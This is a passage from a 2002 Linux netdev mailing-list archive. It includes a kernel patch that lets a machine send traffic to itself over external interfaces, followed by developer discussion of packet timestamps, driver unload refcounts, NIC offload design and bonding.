14 22:04:51 2002 @@ -296,7 +296,9 @@ unsigned short flags; /* interface flags (a la BSD) */ unsigned short gflags; - unsigned short priv_flags; /* Like 'flags' but invisible to userspace. */ + unsigned short priv_flags; /* Like 'flags' but invisible to userspace, + * see: if.h for flag definitions. + */ unsigned short unused_alignment_fixer; /* Because we need priv_flags, * and we want to be 32-bit aligned. 
*/ @@ -438,6 +440,7 @@ /* this will get initialized at each interface type init routine */ struct divert_blk *divert; #endif /* CONFIG_NET_DIVERT */ + }; diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/include/linux/sockios.h linux-2.4.19.dev/include/linux/sockios.h --- linux-2.4.19/include/linux/sockios.h Wed Nov 7 15:39:36 2001 +++ linux-2.4.19.dev/include/linux/sockios.h Sat Sep 14 21:42:29 2002 @@ -114,6 +114,16 @@ #define SIOCBONDINFOQUERY 0x8994 /* rtn info about bond state */ #define SIOCBONDCHANGEACTIVE 0x8995 /* update to a new active slave */ + +/* Ben's little hack land */ +#define SIOCSACCEPTLOCALADDRS 0x89a0 /* Allow interfaces to accept pkts from + * local interfaces...use with SO_BINDTODEVICE + */ +#define SIOCGACCEPTLOCALADDRS 0x89a1 /* Allow interfaces to accept pkts from + * local interfaces...use with SO_BINDTODEVICE + */ + + /* Device private ioctl calls */ /* diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/include/net/tcp.h linux-2.4.19.dev/include/net/tcp.h --- linux-2.4.19/include/net/tcp.h Sat Sep 14 22:13:45 2002 +++ linux-2.4.19.dev/include/net/tcp.h Sat Sep 14 22:26:37 2002 @@ -519,6 +519,12 @@ struct tcp_v6_open_req v6_req; #endif } af; + int bound_dev_if; /* This is so we can connect to ourselves and not collide + * in the open-request hash (the addresses and ports are the + * same, but we need two ends, so use the interface to determine + * one from the other. Active when SO_BINDTODEVICE is used. + * --Ben + */ }; /* SLAB cache for open requests. 
*/ diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/net/core/dev.c linux-2.4.19.dev/net/core/dev.c --- linux-2.4.19/net/core/dev.c Sat Sep 14 22:13:45 2002 +++ linux-2.4.19.dev/net/core/dev.c Sat Sep 14 21:42:29 2002 @@ -2151,6 +2181,24 @@ notifier_call_chain(&netdev_chain, NETDEV_CHANGENAME, dev); return 0; + case SIOCSACCEPTLOCALADDRS: + if (ifr->ifr_flags) { + dev->priv_flags |= IFF_ACCEPT_LOCAL_ADDRS; + } + else { + dev->priv_flags &= ~IFF_ACCEPT_LOCAL_ADDRS; + } + return 0; + + case SIOCGACCEPTLOCALADDRS: + if (dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS) { + ifr->ifr_flags = 1; + } + else { + ifr->ifr_flags = 0; + } + return 0; + /* * Unknown or private ioctl */ @@ -2247,6 +2295,7 @@ case SIOCGIFMAP: case SIOCGIFINDEX: case SIOCGIFTXQLEN: + case SIOCGACCEPTLOCALADDRS: dev_load(ifr.ifr_name); read_lock(&dev_base_lock); ret = dev_ifsioc(&ifr, cmd); @@ -2310,6 +2359,7 @@ case SIOCBONDSLAVEINFOQUERY: case SIOCBONDINFOQUERY: case SIOCBONDCHANGEACTIVE: + case SIOCSACCEPTLOCALADDRS: if (!capable(CAP_NET_ADMIN)) return -EPERM; dev_load(ifr.ifr_name); diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/net/ipv4/arp.c linux-2.4.19.dev/net/ipv4/arp.c --- linux-2.4.19/net/ipv4/arp.c Fri Aug 2 17:39:46 2002 +++ linux-2.4.19.dev/net/ipv4/arp.c Sat Sep 14 21:58:57 2002 @@ -1,4 +1,4 @@ -/* linux/net/inet/arp.c +/* linux/net/inet/arp.c -*-linux-c-*- * * Version: $Id: arp.c,v 1.99 2001/08/30 22:55:42 davem Exp $ * @@ -351,12 +351,22 @@ int flag = 0; /*unsigned long now; */ - if (ip_route_output(&rt, sip, tip, 0, 0) < 0) + if (ip_route_output(&rt, sip, tip, 0, 0) < 0) { return 1; - if (rt->u.dst.dev != dev) { - NET_INC_STATS_BH(ArpFilter); - flag = 1; - } + } + if (rt->u.dst.dev != dev) { + if ((dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS) && + (rt->u.dst.dev == &loopback_dev)) { + /* OK, we'll let this special case slide, so that we can arp from one + * local interface to another. This seems to work, but could use some + * review. 
--Ben + */ + } + else { + NET_INC_STATS_BH(ArpFilter); + flag = 1; + } + } ip_rt_put(rt); return flag; } diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/net/ipv4/fib_frontend.c linux-2.4.19.dev/net/ipv4/fib_frontend.c --- linux-2.4.19/net/ipv4/fib_frontend.c Fri Aug 2 17:39:46 2002 +++ linux-2.4.19.dev/net/ipv4/fib_frontend.c Sat Sep 14 21:42:29 2002 @@ -228,13 +228,24 @@ } read_unlock(&inetdev_lock); - if (in_dev == NULL) + if (in_dev == NULL) { goto e_inval; + } - if (fib_lookup(&key, &res)) + if (fib_lookup(&key, &res)) { goto last_resort; - if (res.type != RTN_UNICAST) - goto e_inval_res; + } + + if (res.type != RTN_UNICAST) { + if ((res.type == RTN_LOCAL) && + (dev->priv_flags & IFF_ACCEPT_LOCAL_ADDRS)) { + /* All is OK */ + } + else { + goto e_inval_res; + } + } + *spec_dst = FIB_RES_PREFSRC(res); fib_combine_itag(itag, &res); #ifdef CONFIG_IP_ROUTE_MULTIPATH diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/net/ipv4/ip_output.c linux-2.4.19.dev/net/ipv4/ip_output.c --- linux-2.4.19/net/ipv4/ip_output.c Sat Sep 14 22:13:47 2002 +++ linux-2.4.19.dev/net/ipv4/ip_output.c Sat Sep 14 21:44:58 2002 @@ -975,7 +975,7 @@ daddr = replyopts.opt.faddr; } - if (ip_route_output(&rt, daddr, rt->rt_spec_dst, RT_TOS(skb->nh.iph->tos), 0)) + if (ip_route_output(&rt, daddr, rt->rt_spec_dst, RT_TOS(skb->nh.iph->tos), sk->bound_dev_if)) return; /* And let IP do all the hard work. diff -u -r -N -X /home/greear/exclude.list linux-2.4.19/net/ipv4/tcp_ipv4.c linux-2.4.19.dev/net/ipv4/tcp_ipv4.c --- linux-2.4.19/net/ipv4/tcp_ipv4.c Fri Aug 2 17:39:46 2002 +++ linux-2.4.19.dev/net/ipv4/tcp_ipv4.c Sat Sep 14 21:54:51 2002 @@ -865,21 +865,32 @@ return h&(TCP_SYNQ_HSIZE-1); } +/** Netdevice ID can be wild-carded by making it zero. 
+ */ static struct open_request *tcp_v4_search_req(struct tcp_opt *tp, struct open_request ***prevp, __u16 rport, - __u32 raddr, __u32 laddr) + __u32 raddr, __u32 laddr, + int netdevice_id) { struct tcp_listen_opt *lopt = tp->listen_opt; struct open_request *req, **prev; + /* Will only take netdevice_id into the equation if neither are + * 0. This should be backwards compatible with older code, and also + * let us connect to ourselves over external ports. Otherwise, we + * get confused about which connection is the originator v/s the + * receiver of the open request. --Ben + */ for (prev = &lopt->syn_table[tcp_v4_synq_hash(raddr, rport)]; (req = *prev) != NULL; prev = &req->dl_next) { if (req->rmt_port == rport && req->af.v4_req.rmt_addr == raddr && req->af.v4_req.loc_addr == laddr && - TCP_INET_FAMILY(req->class->family)) { + TCP_INET_FAMILY(req->class->family) && + ((!netdevice_id) || (!req->bound_dev_if) || + (req->bound_dev_if == netdevice_id))) { BUG_TRAP(req->sk == NULL); *prevp = prev; return req; @@ -899,7 +910,8 @@ req->retrans = 0; req->sk = NULL; req->dl_next = lopt->syn_table[h]; - + req->bound_dev_if = sk->bound_dev_if; + write_lock(&tp->syn_wait_lock); lopt->syn_table[h] = req; write_unlock(&tp->syn_wait_lock); @@ -979,7 +991,8 @@ struct sock *sk; __u32 seq; int err; - + int netdevice_id = 0; + if (skb->len < (iph->ihl << 2) + 8) { ICMP_INC_STATS_BH(IcmpInErrors); return; @@ -1048,9 +1061,13 @@ if (sk->lock.users != 0) goto out; + if (skb->dev) { + netdevice_id = skb->dev->ifindex; + } + req = tcp_v4_search_req(tp, &prev, th->dest, - iph->daddr, iph->saddr); + iph->daddr, iph->saddr, netdevice_id); if (!req) goto out; @@ -1394,7 +1411,7 @@ #define want_cookie 0 /* Argh, why doesn't gcc optimize this :( */ #endif - /* Never answer to SYNs send to broadcast or multicast */ + /* Never answer to SYNs sent to broadcast or multicast */ if (((struct rtable *)skb->dst)->rt_flags & (RTCF_BROADCAST|RTCF_MULTICAST)) goto drop; @@ -1452,6 +1469,8 @@ 
req->af.v4_req.rmt_addr = saddr; req->af.v4_req.opt = tcp_v4_save_options(sk, skb); req->class = &or_ipv4; + req->bound_dev_if = sk->bound_dev_if; + if (!want_cookie) TCP_ECN_create_request(req, skb->h.th); @@ -1587,11 +1606,12 @@ struct iphdr *iph = skb->nh.iph; struct tcp_opt *tp = &(sk->tp_pinfo.af_tcp); struct sock *nsk; - + int device_id = tcp_v4_iif(skb); + /* Find possible connection requests. */ req = tcp_v4_search_req(tp, &prev, th->source, - iph->saddr, iph->daddr); + iph->saddr, iph->daddr, device_id); if (req) return tcp_check_req(sk, skb, req, prev); @@ -1599,7 +1619,7 @@ th->source, skb->nh.iph->daddr, ntohs(th->dest), - tcp_v4_iif(skb)); + device_id); if (nsk) { if (nsk->state != TCP_TIME_WAIT) { -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From laforge@gnumonks.org Sun Sep 15 01:42:38 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 15 Sep 2002 01:42:45 -0700 (PDT) Received: from coruscant.gnumonks.org (mail@coruscant.franken.de [193.174.159.226]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8F8gYtG019063 for ; Sun, 15 Sep 2002 01:42:37 -0700 Received: from [192.168.200.2] (helo=sunbeam.gnumonks.org) by coruscant.gnumonks.org with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.34 #1) id 17qV3o-0004pI-00; Sun, 15 Sep 2002 10:47:20 +0200 Received: from laforge by sunbeam.gnumonks.org with local (Exim 3.34 #1) id 17qUyf-0006UN-00; Sun, 15 Sep 2002 10:42:01 +0200 Date: Sun, 15 Sep 2002 10:42:01 +0200 From: Harald Welte To: Andi Kleen Cc: kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com Subject: Re: packet re-ordering on SMP machines. 
Message-ID: <20020915104201.D3810@sunbeam.de.gnumonks.org> References: <20020827142004.C4358@wotan.suse.de> <200208271306.RAA19164@sex.inr.ac.ru> <20020827151317.A3389@wotan.suse.de> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="QgTrJPeCZfhZbFCN" Content-Disposition: inline User-Agent: Mutt/1.3.17i In-Reply-To: <20020827151317.A3389@wotan.suse.de>; from ak@suse.de on Tue, Aug 27, 2002 at 03:13:17PM +0200 X-Operating-System: Linux sunbeam.de.gnumonks.org 2.4.19-pre10-newnat-pptp X-Date: Today is Sweetmorn, the 32nd day of Bureaucracy in the YOLD 3168 X-archive-position: 186 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: laforge@gnumonks.org Precedence: bulk X-list: netdev --QgTrJPeCZfhZbFCN Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Aug 27, 2002 at 03:13:17PM +0200, Andi Kleen wrote: > > On Tue, Aug 27, 2002 at 05:06:30PM +0400, A.N.Kuznetsov wrote: > > Hello! > > > > > Of course. The only problem is that the clock can be non mononotonous > > > sometimes and not be in sync with gettimeofday, but at least the kernel > > > users of packet timestamps do not care. > > > > What kernel users? Where did you find them? :-) > > Hmm, I thought TCP used it, but it seems to use jiffies directly. > > Ok, no kernel users then. Not sure about sunrpc and out of tree stuff > like SCTP. The iptables ULOG target passes the skb receive timestamp to userspace, where it is (depending on local ulogd configuration) written in logging/accounting databases. (ULOG is in the kernel tree). The issue is that ULOG is batching multiple packets (or parts of packets) into one netlink message sent to userspace. If userspace would make a timestamp, it would be very inaccurate. 
There is at least one more iptables extension (out of the kernel tree) using it - but I wouldn't consider this as important. > -Andi -- Live long and prosper - Harald Welte / laforge@gnumonks.org http://www.gnumonks.org/ ============================================================================ GCS/E/IT d- s-: a-- C+++ UL++++$ P+++ L++++$ E--- W- N++ o? K- w--- O- M+ V-- PS++ PE-- Y++ PGP++ t+ 5-- !X !R tv-- b+++ !DI !D G+ e* h--- r++ y+(*) --QgTrJPeCZfhZbFCN Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9hEfZXaXGVTD0i/8RAsZQAKCp+oE1Ud5bJlFstlyTGQBL/O4gVgCfTCTU iWjRjN0Vuhzf4CdqoZFbv2A= =e38Z -----END PGP SIGNATURE----- --QgTrJPeCZfhZbFCN-- From greearb@candelatech.com Sun Sep 15 10:28:34 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 15 Sep 2002 10:28:37 -0700 (PDT) Received: from grok.yi.org (IDENT:A07mAH7GwI+QbdEBOF8CBKc7pAy3wZku@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8FHSXtG030445 for ; Sun, 15 Sep 2002 10:28:34 -0700 Received: from candelatech.com (IDENT:/pzlAQkmMRZHkB4gzVPNAZxQJ96byLuJ@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8FHXMv18404 for ; Sun, 15 Sep 2002 10:33:23 -0700 Message-ID: <3D84C462.7020104@candelatech.com> Date: Sun, 15 Sep 2002 10:33:22 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" Subject: unregister_netdevice, usage count = 0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 187 X-ecartis-version: Ecartis v1.0.0 Sender: 
netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev For one reason or another, when trying to unload the e1000 NAPI'fied driver from 2.4.20-pre7, I see this error repeatedly: unregister_netdevice: waiting for eth2 to become free. Usage count = 0 So, I'm wondering if the code in dev.c, line 2688: now = warning_time = jiffies; while (atomic_read(&dev->refcnt) != 1) { if ((jiffies - now) > 1*HZ) { /* Rebroadcast unregister notification */ notifier_call_chain(&netdev_chain, NETDEV_UNREGISTER, dev); } current->state = TASK_INTERRUPTIBLE; schedule_timeout(HZ/4); current->state = TASK_RUNNING; if ((jiffies - warning_time) > 10*HZ) { printk(KERN_EMERG "unregister_netdevice: waiting for %s to " "become free. Usage count = %d\n", dev->name, atomic_read(&dev->refcnt)); warning_time = jiffies; } } dev_put(dev); should be like this instead: while (atomic_read(&dev->refcnt) > 1) { Now, off to see if I can track down the real problem... Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From hadi@cyberus.ca Sun Sep 15 13:18:32 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 15 Sep 2002 13:18:34 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8FKIVtG000309 for ; Sun, 15 Sep 2002 13:18:31 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id QAA29914; Sun, 15 Sep 2002 16:23:11 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8FKGDJ26220; Sun, 15 Sep 2002 16:16:13 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Sun, 15 Sep 2002 16:16:13 -0400 (EDT) From: jamal To: "David S. 
Miller" cc: , , , , Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020913.150439.27187393.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 188 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev 10 gige becomes more of an interesting beast. Not sure if we would see servers with 10gige real soon now. Your proposal does make sense although compute power would still be a player. I think the key would be parallelization; Now if it wasnt for the stupid way TCP options were designed you could easily do remote DMA instead. Would be relatively easy to add NIC support for that. Maybe SCTP would save us ;-> however, if history could be used to predict the future, i think TCP will continue to be "hacked" and fit the throughput requirements so no chance for SCTP to be a big player i am afraid . cheers, jamal On Fri, 13 Sep 2002, David S. Miller wrote: > From: todd-lkml@osogrande.com > Date: Fri, 13 Sep 2002 15:59:15 -0600 (MDT) > > not sure i understand what you're proposing > > Cards in the future at 10gbit and faster are going to provide > facilities by which: > > 1) You register a IPV4 src_addr/dst_addr TCP src_port/dst_port cookie > with the hardware when TCP connections are openned. > [..] From hadi@cyberus.ca Sun Sep 15 13:25:03 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 15 Sep 2002 13:25:04 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8FKP2tG000714 for ; Sun, 15 Sep 2002 13:25:02 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) 
with ESMTP id QAA01337; Sun, 15 Sep 2002 16:29:52 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8FKMtp26233; Sun, 15 Sep 2002 16:22:55 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Sun, 15 Sep 2002 16:22:55 -0400 (EDT) From: jamal To: Ben Greear cc: "'netdev@oss.sgi.com'" , linux-kernel Subject: Re: [PATCH] Enable sending network traffic to local machine over external interfaces. In-Reply-To: <3D842C3C.6000205@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 189 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev What bad stuff are you smoking lately? Trying to turn linux into a traffic generator OS? ;-> Havent you been accused of that already? Actually, this is probably one of the few times i agree with you because i may have use for this; i dont think the maintainers may. Infact i think you are just about to be shot. How about putting ifdefs so that the code only gets activated if packetgen is active? 
cheers, jamal From greearb@candelatech.com Sun Sep 15 13:36:03 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 15 Sep 2002 13:36:07 -0700 (PDT) Received: from grok.yi.org (IDENT:BElrFhaCb7uJ4vfE/9cPfdt8hhxLFMQW@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8FKa2tG001144 for ; Sun, 15 Sep 2002 13:36:03 -0700 Received: from candelatech.com (IDENT:7IpCo2PtgA1IZkSJWXxmFXFbPXW43h1/@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8FKeZv18185; Sun, 15 Sep 2002 13:40:36 -0700 Message-ID: <3D84F043.1070409@candelatech.com> Date: Sun, 15 Sep 2002 13:40:35 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: jamal CC: "'netdev@oss.sgi.com'" , linux-kernel Subject: Re: [PATCH] Enable sending network traffic to local machine over external interfaces. References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 190 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev jamal wrote: > What bad stuff are you smoking lately? Trying to turn linux into a traffic > generator OS? ;-> Havent you been accused of that already? > Actually, this is probably one of the few times i agree with you because i > may have use for this; i dont think the maintainers may. Infact i think > you are just about to be shot. > How about putting ifdefs so that the code only gets activated if > packetgen is active? > > cheers, > jamal > Pktgen is independent of this particular hack. One of the flag #defines is in the patch to make my life easier, but it can be removed if that makes someone happier... 
Right now, I am getting panics after 30 minutes running at around 250Mbps of tcp traffic to myself over GigE nics. But, I'm running NAPI e1000, the send-to-self hack, and had the pktgen module loaded.... Trying to narrow it down...but so far, it looks like memory corruption, perhaps somewhere in tcp/ip... It can still be #ifdef'd, but some of the code just fixes the SO_BINDTODEVICE feature, so I think that may be worth putting in anyway... Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From kuznet@ms2.inr.ac.ru Sun Sep 15 17:57:22 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 15 Sep 2002 17:57:28 -0700 (PDT) Received: from mops.inr.ac.ru ([212.44.140.147]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8G0vCtG003693 for ; Sun, 15 Sep 2002 17:57:17 -0700 Received: (from kuznet@localhost) by mops.inr.ac.ru (8.6.13/ANK) id BAA00855; Mon, 16 Sep 2002 01:55:43 +0400 Message-Id: <200209152155.BAA00855@mops.inr.ac.ru> Subject: Re: packet re-ordering on SMP machines. To: laforge@gnumonks.org (Harald Welte) Date: Mon, 16 Sep 2002 01:55:43 +0400 (MSD) Cc: ak@suse.de, netdev@oss.sgi.com In-Reply-To: <20020915104201.D3810@sunbeam.de.gnumonks.org> from "Harald Welte" at Sep 15, 2 10:42:01 am From: Alexey Kuznetsov X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 X-archive-position: 191 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > The iptables ULOG target passes the skb receive timestamp to userspace, No difference from packet socket. > one netlink message sent to userspace. If userspace would make a timestamp, Nobody proposed to do this in userspace. This would not even be "inaccuracy": the userspace time of read() is not correlated to the real one at all, e.g. if userspace is going to do some DNS, times will differ unpredictably. 
Alexey From davem@redhat.com Sun Sep 15 21:27:20 2002 Received: with ECARTIS (v1.0.0; list netdev); Sun, 15 Sep 2002 21:27:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8G4RKtG005939 for ; Sun, 15 Sep 2002 21:27:20 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id VAA03003; Sun, 15 Sep 2002 21:23:22 -0700 Date: Sun, 15 Sep 2002 21:23:21 -0700 (PDT) Message-Id: <20020915.212321.64867280.davem@redhat.com> To: hadi@cyberus.ca Cc: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: <20020913.150439.27187393.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 192 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: jamal Date: Sun, 15 Sep 2002 16:16:13 -0400 (EDT) Your proposal does make sense although compute power would still be a player. I think the key would be parallelization; Oh I forgot to mention that some of these cards also compute a cookie for you on receive packets, and you're meant to point the input processing for that packet to a cpu whose number is derived from that cookie it gives you. Lockless per-cpu packet input queues make this sort of hard for us to implement currently.
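A minimal sketch of the cookie-to-CPU steering described above, in plain userspace C. The helper name rx_cookie_to_cpu is hypothetical, and the modulo mapping is an assumption: the message only says the CPU number is "derived from" the cookie, not how.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper: choose the CPU that should run input processing
 * for a received packet, given the cookie the NIC computed for it.
 * Assumption: a plain modulo over the number of CPUs; real hardware
 * may define a different mapping.
 */
static unsigned int rx_cookie_to_cpu(uint32_t cookie, unsigned int ncpus)
{
    assert(ncpus > 0);      /* a zero CPU count would divide by zero */
    return cookie % ncpus;  /* same cookie always lands on the same CPU */
}
```

Because the mapping is a pure function of the cookie, all packets carrying the same cookie are handed to the same CPU, which is the property the per-cpu input queues would need to preserve.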
From cfriesen@nortelnetworks.com Mon Sep 16 06:18:23 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 06:19:25 -0700 (PDT) Received: from zcars04f.ca.nortel.com (zcars04f.nortelnetworks.com [47.129.242.57]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GDINtG027629 for ; Mon, 16 Sep 2002 06:18:23 -0700 Received: from zcard307.ca.nortel.com (americasm01.nt.com [47.129.242.67]) by zcars04f.ca.nortel.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g8GDN8d22146; Mon, 16 Sep 2002 09:23:08 -0400 (EDT) Received: from zcard0k6.ca.nortel.com ([47.129.242.158]) by zcard307.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id SK2MR72W; Mon, 16 Sep 2002 09:23:10 -0400 Received: from pcard0ks.ca.nortel.com ([47.129.117.131]) by zcard0k6.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id RDHYHWMD; Mon, 16 Sep 2002 09:23:10 -0400 Received: from nortelnetworks.com (localhost.localdomain [127.0.0.1]) by pcard0ks.ca.nortel.com (Postfix) with ESMTP id 603E12E112; Mon, 16 Sep 2002 09:23:09 -0400 (EDT) Message-ID: <3D85DB3D.DC65A80B@nortelnetworks.com> Date: Mon, 16 Sep 2002 09:23:09 -0400 X-Sybari-Space: 00000000 00000000 00000000 From: Chris Friesen X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-6mdkenterprise i686) X-Accept-Language: en MIME-Version: 1.0 To: Cacophonix Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: <20020913222213.69396.qmail@web14006.mail.yahoo.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 193 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cfriesen@nortelnetworks.com Precedence: bulk X-list: netdev Cacophonix wrote: > > --- Chris Friesen wrote: > > This has always confused me. Why doesn't the bonding driver try and spread > > all the traffic over all the links? 
> > Because then you risk heavy packet reordering within an individual flow, > which can be detrimental in some cases. > --karthik I can see how it could make the receiving host work more on reassembly, but if throughput is key, wouldn't you still end up better if you can push twice as many packets through the pipe? Chris From todd-lkml@osogrande.com Mon Sep 16 07:14:48 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 07:14:54 -0700 (PDT) Received: from puerco.nm.org (puerco.nm.org [129.121.1.22]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GEEmtG031565 for ; Mon, 16 Sep 2002 07:14:48 -0700 Received: (qmail 22434 invoked from network); 16 Sep 2002 14:15:54 -0000 Received: from unknown (HELO gallinas) (129.121.5.22) by puerco.nm.org with SMTP; 16 Sep 2002 14:15:54 -0000 Date: Mon, 16 Sep 2002 08:16:47 -0600 (MDT) From: todd-lkml@osogrande.com X-X-Sender: todd@gp Reply-To: linux-kernel@vger.kernel.org To: "David S. Miller" cc: "linux-kernel@vger.kernel.org" , "hadi@cyberus.ca" , "tcw@tempest.prismnet.com" , "netdev@oss.sgi.com" , "pfeather@cs.unm.edu" Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020913.150439.27187393.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 194 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: todd-lkml@osogrande.com Precedence: bulk X-list: netdev david, comments/questions below... On Fri, 13 Sep 2002, David S. Miller wrote: > 1) You register a IPV4 src_addr/dst_addr TCP src_port/dst_port cookie > with the hardware when TCP connections are openned. intriguing architecture. are there any standards in progress to support this. bascially, people doing high performance computing have been customizing non-commodity nics (acenic, myrinet, quadrics, etc.) to do some of this cookie registration/scanning. 
it would be nice if there were a standard API/hardware capability that took care of at least this piece. (frankly, it would also be nice if customizable, almost-commodity nics based on processor/memory/firmware architecture rather than just asics (like the acenic) continued to exist). > not also make the api for apps to allocate a buffer in userland that (for > nics that support it) the nic can dma directly into? it seems likely > notification that the buffer was used would have to travel through the > kernel, but it would be nice to save the interrupts altogether. > > This is already doable with sys_sendfile() for send today. The user > just does the following: > > 1) mmap()'s a file with MAP_SHARED to write the data > 2) uses sys_sendfile() to send the data over the socket from that file > 3) uses socket write space monitoring to determine if the portions of > the shared area are reclaimable for new writes > > BTW 